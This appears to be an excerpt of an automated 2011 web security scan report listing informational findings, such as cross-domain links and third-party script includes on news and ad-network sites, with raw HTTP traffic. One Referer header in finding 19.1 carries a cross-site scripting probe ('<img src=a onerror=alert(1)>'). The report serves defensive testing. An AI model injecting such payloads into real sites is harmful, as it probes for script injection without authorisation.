Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...
18.172. http://www.seattlepi.com/flashtalking/ftlocal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /flashtalking/ftlocal.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: btype=web; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; zvents_tracker_sid=13162946948850.7696152536664158; adx=c174511@1316381121@1; aDxT=0.39756556041538715; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:53:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 29368
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:58:06 GMT
x-cdn: Cotendo
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
...[SNIP]...
</title>

       <link rel="SHORTCUT ICON" href="http://seattlepi.ux.hearstdigitalnews.com/favicon.ico" />
       <link rel="apple-touch-icon" href="/apple-touch-icon.png"/>
...[SNIP]...
<meta property="fb:admins" content="561063134,10708529,777888639,557785987,679329235,653226748,58963564,710213297,100001539234772,601331469"/>

<script type="text/javascript" id="adPositionManagerScriptTag" src="http://images.chron.com/apps/adWiz/loadAdWiz.js"></script>
...[SNIP]...
<h4><a href="http://hearstmediaservices.com/market/seattle/">Advertise online</a>
...[SNIP]...
<h4><a href="http://bleacherreport.com/seattle-sports/">Bleacher Report</a>
...[SNIP]...
<h4><a href="http://sanantonioexpressnews.tx.newsmemory.com/">Email newsletters</a>
...[SNIP]...
<h4><a href="http://www.facebook.com/pages/The-Seattle-Post-Intelligencer/7457442370">Facebook</a>
...[SNIP]...
<h4><a href="http://twitter.com/seattlepi">Follow us on Twitter</a>
...[SNIP]...
<h4><a href="http://www.uclick.com/client/spi/uftr/">Trivia</a>
...[SNIP]...
<h4><a href="http://affiliate.zap2it.com/tvlistings/ZCGrid.do?aid=F3J">TV Listings</a>
...[SNIP]...
<div class="hst-ysm">
   <script type="text/javascript" src="http://images.chron.com/CDC/elf/js/ysmwrapper.js"></script>
...[SNIP]...
</b> <a href="http://hearstmediaservices.com/market/seattle/">Advertise online</a>
...[SNIP]...
</a> | <a href="http://www.hearst.com">Hearst Corp.</a>
...[SNIP]...
</b> <a href="http://www.localedgemedia.com">SEO</a> by LocalEdge | <a href="http://www.metrix4media.com">PPC Management</a>
...[SNIP]...
18.173. http://www.tidaltv.com/optout/status.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /optout/status.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout/status.ashx?nocache=0.2459297 HTTP/1.1
Host: www.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt-out=true; tidal_ttid=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:46:51 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: private
Content-Type: image/gif; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.174. http://www.tidaltv.com/optout/verfiyoptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /optout/verfiyoptout.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout/verfiyoptout.ashx?nocache=0.1515462 HTTP/1.1
Host: www.tidaltv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: opt-out=true

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:21:29 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Cache-Control: private
Content-Type: image/gif; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>
18.175. http://www.tribalfusion.com/optout/verify.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /optout/verify.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /optout/verify.js?nocache=0.6490676 HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Etag: "9dMQvRLDm58"
Accept-Ranges: bytes
Date: Sat, 17 Sep 2011 16:43:33 GMT
Last-Modified: Fri, 19 Dec 2008 20:18:49 GMT
Server: Resin/3.1.8
Content-Type: application/x-javascript
Content-Length: 545

document.write('<scr'+'ipt src="http://www.tribalfusion.com/test/opt.js"></scr'+'ipt>');
function OPT_DO ()
{
if(TFID == 'optout')
{
document.write('<img src="http://www.networkadvertising.org/verify/cookie_optout.gif" width="239" height="45">');
}
else if(TFID == 'noid')
{
document.write('<img src="http://www.networkadvertising.org/verify/no_cookie.gif" width="239" height="45">');
}
else
{
document.write('<img src="http://www.networkadvertising.org/verify/cookie_exists.gif" width="239" height="45">');
}


}
18.176. http://www.ugo.com/cm/ugo/js/ugo-global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /cm/ugo/js/ugo-global.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cm/ugo/js/ugo-global.js?nocache062111 HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=87EABF5C-E149-11E0-A3B2-DE2D31DE560E

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:15 GMT
Server: Apache
Last-Modified: Thu, 04 Aug 2011 19:23:11 GMT
ETag: "1ab1706-4d31-4a9b2e95865c0"
Accept-Ranges: bytes
Content-Length: 19761
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cneonction: close
Content-Type: application/x-javascript

/* Global UGO Scripts */
$j(document).ready(function() {

   // awesome custom selector
   $j.expr[':'].parents = function(node,i,m) {    
       return $j(node).parents( m[3] ).length < 1;
   };

// s
...[SNIP]...
' );
   var old_dw = document.write;
   var old_dwl = document.writeln;

   document.write = ugo_make_writer( '#top-300x250' );
   document.writeln = ugo_make_writer( '#top-300x250' );

   var stag = '<script type="text/javascript" src="http://ad.doubleclick.net/adj/ugo.ugo.games/games-index;dev=true;pt=free-games;channel=games;;sz=300x250;pos=top;tile=3;ord=1">';

   $j( '#top-300x250' ).html( stag );

   */
}
18.177. http://www.zvents.com/misc/widgets/20645.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /misc/widgets/20645.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /misc/widgets/20645.js?65617 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 56852
Date: Sat, 17 Sep 2011 00:35:45 GMT
Expires: Sat, 17 Sep 2011 04:35:45 GMT
Cache-Control: max-age=14400
Content-Length: 226756
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Server: nginx/0.6.39
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Aug 2011 01:09:25 GMT


zvents_save_jquery = {};

if (typeof jQuery != 'undefined') zvents_save_jquery.jQuery = jQuery;
if (typeof $ != 'undefined') zvents_save_jquery.$ = $;
/*!
* jQuery JavaScript Library v1.4.2
* http:
...[SNIP]...
</script>',
'<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19. Cross-domain script include  previous  next
There are 77 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:23 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 15 Sep 2011 17:04:23 GMT
Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=%2BVh8H0s8fTT%2FyJTublM%2BiWVvC2%2BXgxUbUPO2JPfLmxQPJcLjX5qzTkpiNBBPst0wI%2BlXbtBUthwow7WNwjS2LQ%3D%3D; expires=Mon, 22-Aug-44591 17:04:23 GMT; path=/; domain=.netmng.com
Content-Length: 768
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"></SCRIPT>
...[SNIP]...
19.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /j.ad?site=seattlepicom&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.seattlepi.com%2F&rurl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&f=0&p=14624935&a=1&rnd=14633219 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 16:23:45 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 489
Expires: 0
Connection: keep-alive

document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?" type="text/javascript"><\/script>\r\n<noscript><a hre
...[SNIP]...
19.3. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=2796&pl=abe61b4b&rnd=77409833483397970 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO=OptOut

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LO=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1942
Date: Sat, 17 Sep 2011 16:38:22 GMT

_378374_amg_acamp_id=196462;
_378374_amg_pcamp_id=90120;
_378374_amg_location_id=72903;
_378374_amg_creative_id=378374;
_378374_amg_loaded=true;
var _amg_378374_content='<iframe width="728" height="90
...[SNIP]...
</script> \n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'<span id="te-clearads-js-adconion01cont3"><script type="text/javascript" src="http://choices.truste.com/ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=tr"></script>
...[SNIP]...
19.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316278115? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316296181487&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5313
Date: Sat, 17 Sep 2011 16:48:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 22 11:56:34 EST 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
19.5. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278462? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100?t=1316296535517&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5279
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:54:22 GMT
Expires: Sat, 17 Sep 2011 16:54:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jul 20 16:48:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
19.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.30

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=;ord=1316277325? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6091
Set-Cookie: id=c3c1d423c000085||t=1316278409|et=730|cs=002213fd4820a643dfe50be397; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:29 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:29 GMT
Date: Sat, 17 Sep 2011 16:53:29 GMT
Expires: Sat, 17 Sep 2011 16:53:29 GMT
Cache-Control: private

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 12:28:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!--
Evidon tag
Campaign: FY12 DVU Inquiry Baseline
Client ID: 279
Notice ID: 1913
Ad Size: 728x90
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=279;nid=1913;crid=177;"></script>
19.7. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.31

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6037
Date: Sat, 17 Sep 2011 17:03:41 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!--
Evidon tag
Campaign: FY12 DVU Inquiry Baseline
Client ID: 279
Notice ID: 1913
Ad Size: 300x250
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1913;crid=179;"></script>
19.8. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?l=24536&sz=728x90&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F728x90%2Fht_1064834_61686626%3Ft%3D1316295397553%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252Fflashtalking%252Fftlocal.html%253Fifsrc%253Dhttp%25253A%25252F%25252Fa.flashtalking.com%25252Fxre%25252F18%25252F189583%25252F237666%25252Fjs%25252Fj-189583-237666.js%2526click%253Dhttp%253A%252F%252Fmpc.mxptint.net%252F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%25253f%2526ftx%253D%2526fty%253D%2526ftadz%253D%2526ftscw%253D%2526cachebuster%253D272524.66208301485%252526ftguid%25253D1343AC00FD7B0F%252526ftcfid%25253D237666001%252526ftoob%25253D%252526ftsg%25253Dadg%26refer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F610%252Fhearst%252F300x250%252Fht_1064834_61686626%253Ft%253D1316295375688%2526tz%253D300%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526url%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F%2526refer%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F&r=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&rnd=464496 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
